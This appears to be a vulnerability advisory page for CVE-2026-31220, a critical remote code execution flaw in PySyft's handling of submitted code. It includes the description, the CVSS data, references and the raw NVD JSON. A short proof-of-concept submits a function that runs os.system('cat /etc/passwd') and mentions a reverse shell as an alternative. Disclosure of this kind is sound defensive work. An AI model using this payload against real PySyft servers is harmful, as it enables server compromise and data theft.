CVE-2026-31220

Description

PySyft (Syft Datasite/Server) versions 0.9.5 and earlier are vulnerable to remote code execution due to insufficient validation and sandboxing of user-submitted code. The system allows low-privileged users to submit Python functions (via @sy.syft_function()) for remote execution on the server. While a code approval mechanism exists, the submitted code undergoes no security checks for dangerous operations (e.g., file access, command execution). Once approved, the code is executed within the server process using exec() and eval() functions without proper isolation. A remote attacker can leverage this to execute arbitrary Python code on the server, leading to complete compromise of the server environment.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PySyft <= 0.9.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import syft as sy

# Decorator used to submit function to the remote server
@sy.syft_function()
def malicious_execution():
    # Import os module to execute system commands
    import os
    # Execute arbitrary command (e.g., reverse shell or file read)
    # Example: reading /etc/passwd
    os.system('cat /etc/passwd')
    return "Code executed successfully"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31220
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31220
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31220/
[4] VulDB https://vuldb.com/cve/CVE-2026-31220
[5] https://github.com/OpenMined/PySyft
[6] https://www.notion.so/CVE-2026-31220-35d1e1393188814186b9e00114a8aba7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31220", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:13.913", "lastModified": "2026-05-15T19:16:57.183", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PySyft (Syft Datasite/Server) versions 0.9.5 and earlier are vulnerable to remote code execution due to insufficient validation and sandboxing of user-submitted code. The system allows low-privileged users to submit Python functions (via @sy.syft_function()) for remote execution on the server. While a code approval mechanism exists, the submitted code undergoes no security checks for dangerous operations (e.g., file access, command execution). Once approved, the code is executed within the server process using exec() and eval() functions without proper isolation. A remote attacker can leverage this to execute arbitrary Python code on the server, leading to complete compromise of the server environment."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/OpenMined/PySyft", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31220-35d1e1393188814186b9e00114a8aba7", "source": "[email protected]"}]}}